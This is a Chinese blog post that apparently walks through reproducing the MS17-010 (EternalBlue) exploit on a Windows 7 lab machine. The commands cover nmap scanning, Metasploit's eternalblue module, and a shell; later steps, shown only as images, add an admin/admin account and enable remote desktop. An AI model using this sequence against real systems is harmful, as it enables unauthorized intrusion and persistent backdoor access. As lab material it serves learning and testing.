前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >MS17010(永恒之蓝)漏洞复现

MS17010(永恒之蓝)漏洞复现

作者头像
全栈程序员站长
发布2022-08-13 10:12:50
1.2K0
发布2022-08-13 10:12:50
举报
文章被收录于专栏:全栈程序员必看

大家好,又见面了,我是你们的朋友全栈君。

MS17010(永恒之蓝)漏洞利用与复现

首先需要准备win7的环境做为靶机

获取信息

利用nmap扫描得到,靶机IP

代码语言:javascript
复制
nmap -sP 192.168.229.0/24

得到: IP:192.168.229.169

在这里插入图片描述
在这里插入图片描述

然后利用:

代码语言:javascript
复制
nmap --script=vuln 192.168.229.169

得到靶机信息:

在这里插入图片描述
在这里插入图片描述

发现可能利用的漏洞: ms17-010

然后启动msf

代码语言:javascript
复制
msfconsole

然后查找漏洞路径:

代码语言:javascript
复制
search ms17-010
在这里插入图片描述
在这里插入图片描述

使用payload进行攻击:

代码语言:javascript
复制
use exploit/windows/smb/ms17_010_eternalblue
set RHOST 192.168.229.169
run
在这里插入图片描述
在这里插入图片描述

然后输入:shell

在这里插入图片描述
在这里插入图片描述

然后在查看当前用户:

代码语言:javascript
复制
net user
在这里插入图片描述
在这里插入图片描述

发现用乱码可以用这个取消乱码:

代码语言:javascript
复制
chcp 65001

然后添加一个admin用户密码也为admin

在这里插入图片描述
在这里插入图片描述

然后开启3389端口:

在这里插入图片描述
在这里插入图片描述

然后在开启远程控制:

在这里插入图片描述
在这里插入图片描述

得到:

在这里插入图片描述
在这里插入图片描述

发布者:全栈程序员栈长,转载请注明出处:https://javaforall.cn/132483.html原文链接:https://javaforall.cn

本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2022年4月3,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • MS17010(永恒之蓝)漏洞利用与复现
  • 获取信息
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档